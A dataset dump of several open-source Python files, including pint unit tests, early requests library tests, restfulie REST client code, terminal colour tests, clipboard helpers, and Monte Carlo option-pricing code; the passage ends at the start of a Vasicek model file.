metadata (dict) | text (string, lengths 60 to 3.49M) |
---|---|
{
"source": "JNRowe-retired/pint",
"score": 3
} |
#### File: pint/testsuite/test_quantity.py
```python
from __future__ import division, unicode_literals, print_function, absolute_import
import copy
import math
import operator as op
from pint.unit import UnitsContainer
from pint import DimensionalityError, UndefinedUnitError
from pint.testsuite import TestCase, string_types, PYTHON3
class TestQuantity(TestCase):
FORCE_NDARRAY = False
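# The two helpers below encode the contract these tests rely on: an in-place
# operator (iadd, isub, ...) must mutate and return the very same object
# (checked via id()), while the plain operator must leave both operands
# untouched and hand back a fresh object.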
def _test_inplace(self, operator, value1, value2, expected_result):
if isinstance(value1, string_types):
value1 = self.Q_(value1)
if isinstance(value2, string_types):
value2 = self.Q_(value2)
if isinstance(expected_result, string_types):
expected_result = self.Q_(expected_result)
value1 = copy.copy(value1)
value2 = copy.copy(value2)
id1 = id(value1)
id2 = id(value2)
value1 = operator(value1, value2)
value2_cpy = copy.copy(value2)
self.assertAlmostEqual(value1, expected_result)
self.assertEqual(id1, id(value1))
self.assertAlmostEqual(value2, value2_cpy)
self.assertEqual(id2, id(value2))
def _test_not_inplace(self, operator, value1, value2, expected_result):
if isinstance(value1, string_types):
value1 = self.Q_(value1)
if isinstance(value2, string_types):
value2 = self.Q_(value2)
if isinstance(expected_result, string_types):
expected_result = self.Q_(expected_result)
id1 = id(value1)
id2 = id(value2)
value1_cpy = copy.copy(value1)
value2_cpy = copy.copy(value2)
result = operator(value1, value2)
self.assertAlmostEqual(expected_result, result)
self.assertAlmostEqual(value1, value1_cpy)
self.assertAlmostEqual(value2, value2_cpy)
self.assertNotEqual(id(result), id1)
self.assertNotEqual(id(result), id2)
def test_quantity_creation(self):
for args in ((4.2, 'meter'),
(4.2, UnitsContainer(meter=1)),
('4.2*meter', ),
('4.2/meter**(-1)', ),
(self.Q_(4.2, 'meter'),)):
x = self.Q_(*args)
self.assertEqual(x.magnitude, 4.2)
self.assertEqual(x.units, UnitsContainer(meter=1))
x = self.Q_(None, UnitsContainer(length=1))
self.assertEqual(x.magnitude, None)
self.assertEqual(x.units, UnitsContainer(length=1))
x = self.Q_(4.2, UnitsContainer(length=1))
y = self.Q_(x)
self.assertEqual(x.magnitude, y.magnitude)
self.assertEqual(x.units, y.units)
self.assertIsNot(x, y)
x = self.Q_(4.2, None)
self.assertEqual(x.magnitude, 4.2)
self.assertEqual(x.units, UnitsContainer())
def test_quantity_bool(self):
self.assertTrue(self.Q_(1, None))
self.assertTrue(self.Q_(1, 'meter'))
self.assertFalse(self.Q_(0, None))
self.assertFalse(self.Q_(0, 'meter'))
def test_quantity_comparison(self):
x = self.Q_(4.2, 'meter')
y = self.Q_(4.2, 'meter')
z = self.Q_(5, 'meter')
j = self.Q_(5, 'meter*meter')
self.assertTrue(x == x)
self.assertFalse(x != x)
self.assertTrue(x <= y)
self.assertTrue(x >= y)
self.assertFalse(x < y)
self.assertFalse(x > y)
self.assertTrue(x != z)
self.assertTrue(x < z)
self.assertTrue(z != j)
self.assertNotEqual(z, j)
self.assertEqual(self.Q_(0, 'meter'), self.Q_(0, 'centimeter'))
self.assertNotEqual(self.Q_(0, 'meter'), self.Q_(0, 'second'))
self.assertLess(self.Q_(10, 'meter'), self.Q_(5, 'kilometer'))
def test_quantity_comparison_convert(self):
self.assertEqual(self.Q_(1000, 'millimeter'), self.Q_(1, 'meter'))
self.assertEqual(self.Q_(1000, 'millimeter/min'), self.Q_(1000/60, 'millimeter/s'))
def test_quantity_repr(self):
x = self.Q_(4.2, UnitsContainer(meter=1))
self.assertEqual(str(x), '4.2 meter')
self.assertEqual(repr(x), "<Quantity(4.2, 'meter')>")
def test_quantity_format(self):
x = self.Q_(4.12345678, UnitsContainer(meter=2, kilogram=1, second=-1))
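# Pint-specific format codes exercised below (as shown by the expected
# strings): '!l' renders LaTeX, '!p' renders pretty/unicode output, and a
# trailing '~' switches to abbreviated unit symbols (kg, m, s).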
for spec, result in (('{}', str(x)), ('{!s}', str(x)), ('{!r}', repr(x)),
('{0.magnitude}', str(x.magnitude)), ('{0.units}', str(x.units)),
('{0.magnitude!s}', str(x.magnitude)), ('{0.units!s}', str(x.units)),
('{0.magnitude!r}', repr(x.magnitude)), ('{0.units!r}', repr(x.units)),
('{:.4f}', '{:.4f} {!s}'.format(x.magnitude, x.units)),
('{:!l}', r'4.12345678 \frac{kilogram \cdot meter^{2}}{second}'),
('{:!p}', '4.12345678 kilogram·meter²/second'),
('{:!s~}', '4.12345678 kg * m ** 2 / s'),
('{:!l~}', r'4.12345678 \frac{kg \cdot m^{2}}{s}'),
('{:!p~}', '4.12345678 kg·m²/s')
):
self.assertEqual(spec.format(x), result)
def test_quantity_add_sub(self):
x = self.Q_(1., 'centimeter')
y = self.Q_(1., 'inch')
z = self.Q_(1., 'second')
a = self.Q_(1., None)
self._test_not_inplace(op.add, x, x, self.Q_(2., 'centimeter'))
self._test_not_inplace(op.add, x, y, self.Q_(1 + 2.54, 'centimeter'))
self._test_not_inplace(op.add, y, x, self.Q_(1 + 1 / 2.54, 'inch'))
self._test_not_inplace(op.add, a, 1, self.Q_(1 + 1, None))
self.assertRaises(DimensionalityError, op.add, 10, x)
self.assertRaises(DimensionalityError, op.add, x, 10)
self.assertRaises(DimensionalityError, op.add, x, z)
self._test_not_inplace(op.sub, x, x, self.Q_(0., 'centimeter'))
self._test_not_inplace(op.sub, x, y, self.Q_(1 - 2.54, 'centimeter'))
self._test_not_inplace(op.sub, y, x, self.Q_(1 - 1 / 2.54, 'inch'))
self._test_not_inplace(op.sub, a, 1, self.Q_(1 - 1, None))
self.assertRaises(DimensionalityError, op.sub, 10, x)
self.assertRaises(DimensionalityError, op.sub, x, 10)
self.assertRaises(DimensionalityError, op.sub, x, z)
def test_quantity_iadd_isub(self):
x = self.Q_(1., 'centimeter')
y = self.Q_(1., 'inch')
z = self.Q_(1., 'second')
a = self.Q_(1., None)
self._test_inplace(op.iadd, x, x, self.Q_(2., 'centimeter'))
self._test_inplace(op.iadd, x, y, self.Q_(1 + 2.54, 'centimeter'))
self._test_inplace(op.iadd, y, x, self.Q_(1 + 1 / 2.54, 'inch'))
self._test_inplace(op.iadd, a, 1, self.Q_(1 + 1, None))
self.assertRaises(DimensionalityError, op.iadd, 10, x)
self.assertRaises(DimensionalityError, op.iadd, x, 10)
self.assertRaises(DimensionalityError, op.iadd, x, z)
self._test_inplace(op.isub, x, x, self.Q_(0., 'centimeter'))
self._test_inplace(op.isub, x, y, self.Q_(1 - 2.54, 'centimeter'))
self._test_inplace(op.isub, y, x, self.Q_(1 - 1 / 2.54, 'inch'))
self._test_inplace(op.isub, a, 1, self.Q_(1 - 1, None))
self.assertRaises(DimensionalityError, op.sub, 10, x)
self.assertRaises(DimensionalityError, op.sub, x, 10)
self.assertRaises(DimensionalityError, op.sub, x, z)
def test_quantity_mul_div(self):
self._test_not_inplace(op.mul, 10.0, '4.2*meter', '42*meter')
self._test_not_inplace(op.mul, '4.2*meter', 10.0, '42*meter')
self._test_not_inplace(op.mul, '4.2*meter', '10*inch', '42*meter*inch')
self._test_not_inplace(op.truediv, 42, '4.2*meter', '10/meter')
self._test_not_inplace(op.truediv, '4.2*meter', 10.0, '0.42*meter')
self._test_not_inplace(op.truediv, '4.2*meter', '10*inch', '0.42*meter/inch')
def test_quantity_imul_idiv(self):
#self._test_inplace(op.imul, 10.0, '4.2*meter', '42*meter')
self._test_inplace(op.imul, '4.2*meter', 10.0, '42*meter')
self._test_inplace(op.imul, '4.2*meter', '10*inch', '42*meter*inch')
#self._test_not_inplace(op.truediv, 42, '4.2*meter', '10/meter')
self._test_inplace(op.itruediv, '4.2*meter', 10.0, '0.42*meter')
self._test_inplace(op.itruediv, '4.2*meter', '10*inch', '0.42*meter/inch')
def test_quantity_floordiv(self):
self._test_not_inplace(op.floordiv, 10.0, '4.2*meter', '2/meter')
self._test_not_inplace(op.floordiv, '24*meter', 10.0, '2*meter')
self._test_not_inplace(op.floordiv, '10*meter', '4.2*inch', '2*meter/inch')
#self._test_inplace(op.ifloordiv, 10.0, '4.2*meter', '2/meter')
self._test_inplace(op.ifloordiv, '24*meter', 10.0, '2*meter')
self._test_inplace(op.ifloordiv, '10*meter', '4.2*inch', '2*meter/inch')
def test_quantity_abs_round(self):
x = self.Q_(-4.2, 'meter')
y = self.Q_(4.2, 'meter')
# In Python 3 round(x) is delegated to x.__round__ instead of round(x.__float__()),
# and therefore it can be properly implemented by Pint
for fun in (abs, op.pos, op.neg) + ((round,) if PYTHON3 else ()):
zx = self.Q_(fun(x.magnitude), 'meter')
zy = self.Q_(fun(y.magnitude), 'meter')
rx = fun(x)
ry = fun(y)
self.assertEqual(rx, zx, 'while testing {}'.format(fun))
self.assertEqual(ry, zy, 'while testing {}'.format(fun))
self.assertIsNot(rx, zx, 'while testing {}'.format(fun))
self.assertIsNot(ry, zy, 'while testing {}'.format(fun))
def test_quantity_float_complex(self):
x = self.Q_(-4.2, None)
y = self.Q_(4.2, None)
z = self.Q_(1, 'meter')
for fun in (float, complex):
self.assertEqual(fun(x), fun(x.magnitude))
self.assertEqual(fun(y), fun(y.magnitude))
self.assertRaises(DimensionalityError, fun, z)
def test_to_base_units(self):
x = self.Q_('1*inch')
self.assertAlmostEqual(x.to_base_units(), self.Q_(0.0254, 'meter'))
x = self.Q_('1*inch*inch')
self.assertAlmostEqual(x.to_base_units(), self.Q_(0.0254 ** 2.0, 'meter*meter'))
x = self.Q_('1*inch/minute')
self.assertAlmostEqual(x.to_base_units(), self.Q_(0.0254 / 60., 'meter/second'))
def test_convert(self):
x = self.Q_('2*inch')
self.assertAlmostEqual(x.to('meter'), self.Q_(2. * 0.0254, 'meter'))
x = self.Q_('2*meter')
self.assertAlmostEqual(x.to('inch'), self.Q_(2. / 0.0254, 'inch'))
x = self.Q_('2*sidereal_second')
self.assertAlmostEqual(x.to('second'), self.Q_(1.994539133 , 'second'))
x = self.Q_('2.54*centimeter/second')
self.assertAlmostEqual(x.to('inch/second'), self.Q_(1, 'inch/second'))
x = self.Q_('2.54*centimeter')
self.assertAlmostEqual(x.to('inch').magnitude, 1)
self.assertAlmostEqual(self.Q_(2, 'second').to('millisecond').magnitude, 2000)
def test_context_attr(self):
self.assertEqual(self.ureg.meter, self.Q_(1, 'meter'))
def test_both_symbol(self):
self.assertEqual(self.Q_(2, 'ms'), self.Q_(2, 'millisecond'))
self.assertEqual(self.Q_(2, 'cm'), self.Q_(2, 'centimeter'))
def test_dimensionless_units(self):
self.assertAlmostEqual(self.Q_(360, 'degree').to('radian').magnitude, 2 * math.pi)
self.assertAlmostEqual(self.Q_(2 * math.pi, 'radian'), self.Q_(360, 'degree'))
self.assertEqual(self.Q_(1, 'radian').dimensionality, UnitsContainer())
self.assertTrue(self.Q_(1, 'radian').dimensionless)
self.assertFalse(self.Q_(1, 'radian').unitless)
self.assertEqual(self.Q_(1, 'meter')/self.Q_(1, 'meter'), 1)
self.assertEqual((self.Q_(1, 'meter')/self.Q_(1, 'mm')).to(''), 1000)
def test_offset(self):
self.assertAlmostEqual(self.Q_(0, 'degK').to('degK'), self.Q_(0, 'degK'))
self.assertAlmostEqual(self.Q_(0, 'degC').to('degK'), self.Q_(273.15, 'degK'))
self.assertAlmostEqual(self.Q_(0, 'degF').to('degK'), self.Q_(255.372222, 'degK'), places=2)
self.assertAlmostEqual(self.Q_(100, 'degK').to('degK'), self.Q_(100, 'degK'))
self.assertAlmostEqual(self.Q_(100, 'degC').to('degK'), self.Q_(373.15, 'degK'))
self.assertAlmostEqual(self.Q_(100, 'degF').to('degK'), self.Q_(310.92777777, 'degK'), places=2)
self.assertAlmostEqual(self.Q_(0, 'degK').to('degC'), self.Q_(-273.15, 'degC'))
self.assertAlmostEqual(self.Q_(100, 'degK').to('degC'), self.Q_(-173.15, 'degC'))
self.assertAlmostEqual(self.Q_(0, 'degK').to('degF'), self.Q_(-459.67, 'degF'), 2)
self.assertAlmostEqual(self.Q_(100, 'degK').to('degF'), self.Q_(-279.67, 'degF'), 2)
self.assertAlmostEqual(self.Q_(32, 'degF').to('degC'), self.Q_(0, 'degC'), 2)
self.assertAlmostEqual(self.Q_(100, 'degC').to('degF'), self.Q_(212, 'degF'), 2)
def test_offset_delta(self):
self.assertAlmostEqual(self.Q_(0, 'delta_degK').to('delta_degK'), self.Q_(0, 'delta_degK'))
self.assertAlmostEqual(self.Q_(0, 'delta_degC').to('delta_degK'), self.Q_(0, 'delta_degK'))
self.assertAlmostEqual(self.Q_(0, 'delta_degF').to('delta_degK'), self.Q_(0, 'delta_degK'), places=2)
self.assertAlmostEqual(self.Q_(100, 'delta_degK').to('delta_degK'), self.Q_(100, 'delta_degK'))
self.assertAlmostEqual(self.Q_(100, 'delta_degC').to('delta_degK'), self.Q_(100, 'delta_degK'))
self.assertAlmostEqual(self.Q_(100, 'delta_degF').to('delta_degK'), self.Q_(100 * 5 / 9, 'delta_degK'), places=2)
self.assertAlmostEqual(self.Q_(100, 'delta_degK').to('delta_degK'), self.Q_(100, 'delta_degK'))
self.assertAlmostEqual(self.Q_(100, 'delta_degK').to('delta_degC'), self.Q_(100, 'delta_degC'))
self.assertAlmostEqual(self.Q_(100, 'delta_degK').to('delta_degF'), self.Q_(100 * 9 / 5, 'delta_degF'), places=2)
def test_pickle(self):
import pickle
def pickle_test(q):
self.assertEqual(q, pickle.loads(pickle.dumps(q)))
pickle_test(self.Q_(32, ''))
pickle_test(self.Q_(2.4, ''))
pickle_test(self.Q_(32, 'm/s'))
pickle_test(self.Q_(2.4, 'm/s'))
class TestDimensions(TestCase):
FORCE_NDARRAY = False
def test_get_dimensionality(self):
get = self.ureg.get_dimensionality
self.assertEqual(get('[time]'), UnitsContainer({'[time]': 1}))
self.assertEqual(get(UnitsContainer({'[time]': 1})), UnitsContainer({'[time]': 1}))
self.assertEqual(get('seconds'), UnitsContainer({'[time]': 1}))
self.assertEqual(get(UnitsContainer({'seconds': 1})), UnitsContainer({'[time]': 1}))
self.assertEqual(get('[speed]'), UnitsContainer({'[length]': 1, '[time]': -1}))
self.assertEqual(get('[acceleration]'), UnitsContainer({'[length]': 1, '[time]': -2}))
def test_dimensionality(self):
x = self.Q_(42, 'centimeter')
x.to_base_units()
x = self.Q_(42, 'meter*second')
self.assertEqual(x.dimensionality, UnitsContainer({'[length]': 1., '[time]': 1.}))
x = self.Q_(42, 'meter*second*second')
self.assertEqual(x.dimensionality, UnitsContainer({'[length]': 1., '[time]': 2.}))
x = self.Q_(42, 'inch*second*second')
self.assertEqual(x.dimensionality, UnitsContainer({'[length]': 1., '[time]': 2.}))
self.assertTrue(self.Q_(42, None).dimensionless)
self.assertFalse(self.Q_(42, 'meter').dimensionless)
self.assertTrue((self.Q_(42, 'meter') / self.Q_(1, 'meter')).dimensionless)
self.assertFalse((self.Q_(42, 'meter') / self.Q_(1, 'second')).dimensionless)
self.assertTrue((self.Q_(42, 'meter') / self.Q_(1, 'inch')).dimensionless)
``` |
{
"source": "JNRowe-retired/requests",
"score": 3
} |
#### File: JNRowe-retired/requests/test_requests.py
```python
from __future__ import with_statement
import unittest
import cookielib
import requests
class RequestsTestSuite(unittest.TestCase):
"""Requests test cases."""
def setUp(self):
pass
def tearDown(self):
"""Teardown."""
pass
def test_invalid_url(self):
self.assertRaises(ValueError, requests.get, 'hiwpefhipowhefopw')
def test_HTTP_200_OK_GET(self):
r = requests.get('http://google.com')
self.assertEqual(r.status_code, 200)
def test_HTTPS_200_OK_GET(self):
r = requests.get('https://google.com')
self.assertEqual(r.status_code, 200)
def test_HTTP_200_OK_GET_WITH_PARAMS(self):
heads = {'User-agent': 'Mozilla/5.0'}
r = requests.get('http://www.google.com/search', params={'q': 'test'}, headers=heads)
self.assertEqual(r.status_code, 200)
def test_HTTP_200_OK_GET_WITH_MIXED_PARAMS(self):
heads = {'User-agent': 'Mozilla/5.0'}
r = requests.get('http://google.com/search?test=true', params={'q': 'test'}, headers=heads)
self.assertEqual(r.status_code, 200)
def test_user_agent_transfers(self):
"""Issue XX"""
heads = {
'User-agent':
'Mozilla/5.0 (github.com/kennethreitz/requests)'
}
r = requests.get('http://whatsmyua.com', headers=heads)
self.assertTrue(heads['User-agent'] in r.content)
heads = {
'user-agent':
'Mozilla/5.0 (github.com/kennethreitz/requests)'
}
r = requests.get('http://whatsmyua.com', headers=heads)
self.assertTrue(heads['user-agent'] in r.content)
def test_HTTP_200_OK_HEAD(self):
r = requests.head('http://google.com')
self.assertEqual(r.status_code, 200)
def test_HTTPS_200_OK_HEAD(self):
r = requests.head('https://google.com')
self.assertEqual(r.status_code, 200)
def test_AUTH_HTTPS_200_OK_GET(self):
auth = ('requeststest', 'requeststest')
url = 'https://convore.com/api/account/verify.json'
r = requests.get(url, auth=auth)
self.assertEqual(r.status_code, 200)
r = requests.get(url)
self.assertEqual(r.status_code, 200)
# reset auto authentication
requests.auth_manager.empty()
def test_POSTBIN_GET_POST_FILES(self):
bin = requests.post('http://www.postbin.org/')
self.assertEqual(bin.status_code, 302)
post_url = bin.headers['location']
post = requests.post(post_url, data={'some': 'data'})
self.assertEqual(post.status_code, 201)
post2 = requests.post(post_url, files={'some': open('test_requests.py')})
self.assertEqual(post2.status_code, 201)
post3 = requests.post(post_url, data='[{"some": "json"}]')
self.assertEqual(post3.status_code, 201)
def test_POSTBIN_GET_POST_FILES_WITH_PARAMS(self):
bin = requests.post('http://www.postbin.org/')
self.assertEqual(bin.status_code, 302)
post_url = bin.headers['location']
post2 = requests.post(post_url, files={'some': open('test_requests.py')}, data={'some': 'data'})
self.assertEqual(post2.status_code, 201)
def test_POSTBIN_GET_POST_FILES_WITH_HEADERS(self):
bin = requests.post('http://www.postbin.org/')
self.assertEqual(bin.status_code, 302)
post_url = bin.headers['location']
post2 = requests.post(post_url, files={'some': open('test_requests.py')},
headers = {'User-Agent': 'requests-tests'})
self.assertEqual(post2.status_code, 201)
def test_nonzero_evaluation(self):
r = requests.get('http://google.com/some-404-url')
self.assertEqual(bool(r), False)
r = requests.get('http://google.com/')
self.assertEqual(bool(r), True)
def test_request_ok_set(self):
r = requests.get('http://google.com/some-404-url')
self.assertEqual(r.ok, False)
def test_status_raising(self):
r = requests.get('http://google.com/some-404-url')
self.assertRaises(requests.HTTPError, r.raise_for_status)
r = requests.get('http://google.com/')
self.assertFalse(r.error)
r.raise_for_status()
def test_cookie_jar(self):
"""
.. todo:: This really doesn't test to make sure the cookie is working
"""
jar = cookielib.CookieJar()
self.assertFalse(jar)
requests.get('http://google.com', cookies=jar)
self.assertTrue(jar)
def test_decompress_gzip(self):
r = requests.get('http://api.stackoverflow.com/1.1/users/495995/top-answer-tags')
r.content.decode('ascii')
def test_autoauth(self):
conv_auth = ('requeststest', 'requeststest')
requests.auth_manager.add_auth('convore.com', conv_auth)
r = requests.get('https://convore.com/api/account/verify.json')
self.assertEquals(r.status_code, 200)
def test_unicode_get(self):
requests.get('http://google.com', params={'foo': u'føø'})
requests.get('http://google.com', params={u'føø': u'føø'})
requests.get('http://google.com', params={'føø': 'føø'})
requests.get('http://google.com', params={'foo': u'foo'})
requests.get('http://google.com/ø', params={'foo': u'foo'})
def test_httpauth_recursion(self):
conv_auth = ('<PASSWORD>', '<PASSWORD>')
r = requests.get('https://convore.com/api/account/verify.json', auth=conv_auth)
self.assertEquals(r.status_code, 401)
def test_settings(self):
with requests.settings(timeout=0.0001):
self.assertRaises(requests.Timeout, requests.get, 'http://google.com')
with requests.settings(timeout=10):
requests.get('http://google.com')
def test_nonurlencoded_post_data(self):
requests.post('http://google.com', data='foo')
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "JNRowe-retired/restfulie-py",
"score": 3
} |
#### File: restfulie-py/restfulie/opensearch.py
```python
import dsl
class OpenSearchDescription(object):
"""
OpenSearchDescription object wraps the OpenSearch logic
"""
def __init__(self, element_tree):
self.url_type = 'application/rss+xml'
self.element_tree = element_tree
def use(self, url_type):
"""
Set the OpenSearch type
"""
self.url_type = url_type
return self
def search(self, searchTerms, startPage):
"""
Make a search with 'searchTerms'
It will find the url_type URL that you have chosen
"""
tag = '{http://a9.com/-/spec/opensearch/1.1/}Url'
urls = self.element_tree.findall(tag)
for url in urls:
if url.get('type') == self.url_type:
template = url.get('template')
template = template.replace('{searchTerms}', searchTerms)
template = template.replace('{startPage?}', str(startPage))
return dsl.Dsl(template).accepts(self.url_type).get()
```
#### File: restfulie-py/restfulie/restfulie.py
```python
from dsl import Dsl
class Restfulie(object):
"""
Restfulie DSL entry point.
"""
@staticmethod
def at(uri):
"""
Create a new entry point for executing requests to the given uri.
"""
return Dsl(uri)
```
#### File: restfulie-py/test/lazy_response_test.py
```python
from multiprocessing import Pipe
from restfulie.response import LazyResponse, Response
from mockito import mock, verify
class lazy_response_test:
def forwarding_attrs_from_real_response_test(self):
response = mock()
response.code = 200
response.body = 'Hello'
child_pipe = None
lazy_response = LazyResponse(child_pipe)
lazy_response._response = response
assert lazy_response.code == 200
assert lazy_response.body == 'Hello'
verify(response).code
verify(response).body
def simple_test(self):
response = ({'status': 200}, 'Hello')
r = Response(response)
pipe, child_pipe = Pipe()
lazy_response = LazyResponse(child_pipe)
pipe.send(r)
assert lazy_response.code == 200
assert lazy_response.body == 'Hello'
def resource_test(self):
response = ({'status': 200, 'content-type': 'text/plain; charset=utf-8'}, \
'Hello')
r = Response(response)
pipe, child_pipe = Pipe()
lazy_response = LazyResponse(child_pipe)
pipe.send(r)
assert lazy_response.resource() == 'Hello'
def link_test(self):
response = ({'status': 200, 'link': '</feed>; rel="alternate"'}, 'Hello')
r = Response(response)
pipe, child_pipe = Pipe()
lazy_response = LazyResponse(child_pipe)
pipe.send(r)
link = lazy_response.link('alternate')
assert link.href == '/feed'
assert link.rel == 'alternate'
```
#### File: restfulie-py/test/request_test.py
```python
from restfulie.dsl import Dsl
from restfulie.request import Request
from mockito import mock
from threading import Semaphore
class callable_mock():
def __init__(self):
self.called = 0
def __call__(self, *args, **kwargs):
self.called = self.called + 1
class http_method_test:
def setup(self):
self.dsl = mock(Dsl)
self.request = Request(self.dsl)
def should_make_synchronous_invocations_with_simple_auth(self):
self.dsl.credentials = 'test:test'
self.dsl.callback = None
self.dsl.is_async = False
self.request._process_flow = callable_mock()
self.request()
assert self.request._process_flow.called == 1
def should_make_synchronous_invocations_if_callback_isnt_configured(self):
self.dsl.callback = None
self.dsl.is_async = False
self.request._process_flow = callable_mock()
self.request()
assert self.request._process_flow.called == 1
def should_make_asynchronous_invocations_if_callback_is_configured(self):
self.dsl.callback = lambda: None
self.dsl.is_async = True
self.request._process_async_flow = callable_mock()
self.request()
assert self.request._process_async_flow.called == 1
def should_call_callback_function_on_asynchronous_request(self):
barrier = Semaphore(0)
def callback(request):
barrier.release()
self.dsl.is_async = True
self.dsl.callback = callback
self.dsl.callback_args = ()
self.request._process_flow = lambda payload: None
self.request()
barrier.acquire()
def should_call_callback_on_async_request_and_pass_arguments(self):
barrier = Semaphore(0)
def callback(request, arg1, arg2, arg3):
assert (arg1, arg2, arg3) == (1, 2, 3)
barrier.release()
self.dsl.is_async = True
self.dsl.callback = callback
self.dsl.callback_args = (1, 2, 3)
self.request._process_flow = lambda payload: None
self.request()
barrier.acquire()
```
#### File: restfulie-py/test/response_test.py
```python
from restfulie.response import Response
class response_test:
def trivial_test(self):
response = ({'status': 200}, 'Hello')
r = Response(response)
assert r.body == 'Hello'
assert r.code == 200
def resource_test(self):
response = ({'status': 200, 'content-type': \
'text/plain; charset=utf-8'}, 'Hello')
r = Response(response)
assert r.resource() == 'Hello'
def link_test(self):
response = ({'status': 200, 'link': '</feed>; rel="alternate"'}, 'Hello')
r = Response(response)
link = r.link('alternate')
assert link.href == '/feed'
assert link.rel == 'alternate'
``` |
{
"source": "JNRowe-retired/terminal",
"score": 2
} |
#### File: terminal/tests/test_color.py
```python
import os
import terminal
from nose.tools import raises
def test_colorize():
print(terminal.colorize('bold', 'bold'))
print(terminal.colorize('red', 'red'))
print(terminal.colorize('red', '#ff0000'))
print(terminal.colorize('red', 'ff0000'))
print(terminal.colorize('red', 'f00'))
print(terminal.colorize('red', (255, 0, 0)))
print(terminal.colorize('gray', (80, 80, 80)))
print(terminal.colorize('red', 'f00', True))
def test_colors():
print(terminal.cyan('cyan color'))
print(terminal.blue('blue color'))
print(terminal.yellow('yellow color'))
print(terminal.magenta('magenta color'))
print(terminal.black('black color'))
print(terminal.white('white color'))
print(terminal.gray('gray color'))
print(terminal.grey('grey color'))
print(terminal.red(terminal.green('green color')))
print(terminal.cyan_bg('cyan background'))
print(terminal.blue_bg('blue background'))
print(terminal.yellow_bg('yellow background'))
print(terminal.magenta_bg('magenta background'))
print(terminal.black_bg('black background'))
print(terminal.white_bg('white background'))
print(terminal.gray_bg('gray background'))
print(terminal.grey_bg('grey background'))
print(terminal.red_bg(terminal.green_bg('green background')))
def test_styles():
print(terminal.bold('bold style'))
print(terminal.faint('faint style'))
print(terminal.italic('italic style'))
print(terminal.underline('underline style'))
print(terminal.blink('blink style'))
print(terminal.overline('overline style'))
print(terminal.inverse('inverse style'))
print(terminal.conceal('conceal style'))
print(terminal.strike('strike style'))
print(terminal.bold(terminal.underline('bold and underline style')))
@raises(ValueError)
def test_hex2ansi():
terminal.hex2ansi('ffbbccd')
@raises(ValueError)
def test_raise_colorize():
print(terminal.colorize('text', {'foo': 'bar'}))
def test_256color():
env = Environ()
env.enable_256color()
print(terminal.gray('gray color'))
print(terminal.gray_bg('gray background'))
env.reset()
class Environ(object):
def __init__(self):
self.term = os.environ.get('TERM', None)
def enable_256color(self):
os.environ['TERMINAL-COLOR'] = 'true'
os.environ['COLORTERM'] = 'true'
os.environ['TERM'] = 'xterm-256color'
def enable_color(self):
os.environ['TERMINAL-COLOR'] = 'true'
os.environ['TERM'] = 'xterm'
def reset(self):
del os.environ['TERMINAL-COLOR']
if 'COLORTERM' in os.environ:
del os.environ['COLORTERM']
if self.term:
os.environ['TERM'] = self.term
class TestColor(object):
def test_property(self):
env = Environ()
env.enable_color()
s = terminal.Color('text')
print(s.bold.red.underline)
print(s.green_bg)
env.reset()
def test_set_attribute(self):
env = Environ()
env.enable_256color()
s = terminal.Color('text')
s.bgcolor = 'red'
s.fgcolor = 'white'
print(s)
s.bgcolor = 'd64'
print(s)
env.reset()
@raises(AttributeError)
def test_property_raise(self):
s = terminal.Color('text')
print(s.unknown)
@raises(AttributeError)
def test_unknown_bg(self):
s = terminal.Color('text')
print(s.unknown_bg)
def test_plus(self):
foo = terminal.Color('foo')
print(foo.green + 'bar')
print('bar' + foo)
assert len(foo) == 3
assert len('bar' + foo) == 6
bar = terminal.Color('foo')
print(foo.green + bar)
print(bar + foo)
@raises(TypeError)
def test_add_raise(self):
foo = terminal.Color('foo')
print(foo.green + 1)
@raises(TypeError)
def test_radd_raise(self):
foo = terminal.Color('foo')
print(1 + foo.green)
def test_repr(self):
foo = terminal.Color('foo')
foo.fgcolor = 'red'
assert repr(foo) == repr(str(foo))
``` |
{
"source": "JNRowe-retired/xerox",
"score": 3
} |
#### File: xerox/xerox/darwin.py
```python
import subprocess
from .base import *
def copy(string):
"""Copy given string into system clipboard."""
try:
subprocess.Popen(['pbcopy'], stdin=subprocess.PIPE).communicate(
string.encode("utf-8"))
except OSError as why:
raise XcodeNotFound
return
def paste():
"""Returns system clipboard contents."""
try:
return subprocess.check_output('pbpaste').decode("utf-8")
except OSError as why:
raise XcodeNotFound
```
#### File: xerox/xerox/linux.py
```python
import subprocess
from .base import *
def copy(string):
"""Copy given string into system clipboard."""
try:
_cmd = ["xclip", "-selection", "clipboard"]
subprocess.Popen(_cmd, stdin=subprocess.PIPE).communicate(
string.encode('utf-8'))
return
except OSError as why:
raise XclipNotFound
def paste():
"""Returns system clipboard contents."""
try:
return subprocess.Popen(["xclip", "-selection", "clipboard", "-o"], stdout=subprocess.PIPE).communicate()[0].decode("utf-8")
except OSError as why:
raise XclipNotFound
``` |
{
"source": "jnrsgsig/joshi_cpp",
"score": 3
} |
#### File: jnrsgsig/joshi_cpp/double_digital.py
```python
from typing import Union
import numpy as np
from payoff import Payoff
class PayoffDoubleDigital(Payoff):
def __init__(self, lower_level_: float, upper_level_: float):
self.lower_level = lower_level_
self.upper_level = upper_level_
def __call__(self, spot_: Union[float, np.ndarray]) -> Union[float, np.ndarray]:
return (spot_ > self.lower_level) & (spot_ < self.upper_level)
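# The payoff is 1 when the spot lies strictly between the two barriers and 0
# otherwise; returning the boolean (or boolean array) lets NumPy treat it as
# a 0/1 payoff in vectorised Monte Carlo code.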
def __copy__(self):
return self.__class__(self.lower_level, self.upper_level)
if __name__ == '__main__':
pass
```
#### File: jnrsgsig/joshi_cpp/simple_mc.py
```python
import numpy as np
from numpy.random import standard_normal
from vanilla_option import VanillaOption
def simple_monte_carlo(vanilla_option: VanillaOption, spot: float, vol: float, r: float, number_of_paths: int):
expiry = vanilla_option.expiry
variance = vol * vol * expiry
root_variance = np.sqrt(variance)
ito_correction = - 0.5 * variance
moved_spot = spot * np.exp(r * expiry + ito_correction)
this_gaussian = standard_normal(number_of_paths)
this_spot = moved_spot * np.exp(root_variance * this_gaussian)
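# this_spot is drawn directly from the exact terminal distribution of
# geometric Brownian motion, S_T = S_0 * exp((r - 0.5*vol**2)*T + vol*sqrt(T)*Z),
# so no time-stepping is needed for this European-style payoff.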
mean_payoff = vanilla_option.option_payoff(this_spot).mean()
mean_payoff *= np.exp(- r * expiry)
return mean_payoff
if __name__ == '__main__':
pass
``` |
{
"source": "jnrsgsig/python_time_series_models",
"score": 3
} |
#### File: python_time_series_models/models_for_1d_risk_factor/vasicek_model.py
```python
from pprint import pprint
import numpy as np
import matplotlib.pyplot as plt
from time_series_model_template import TimeSeriesModel
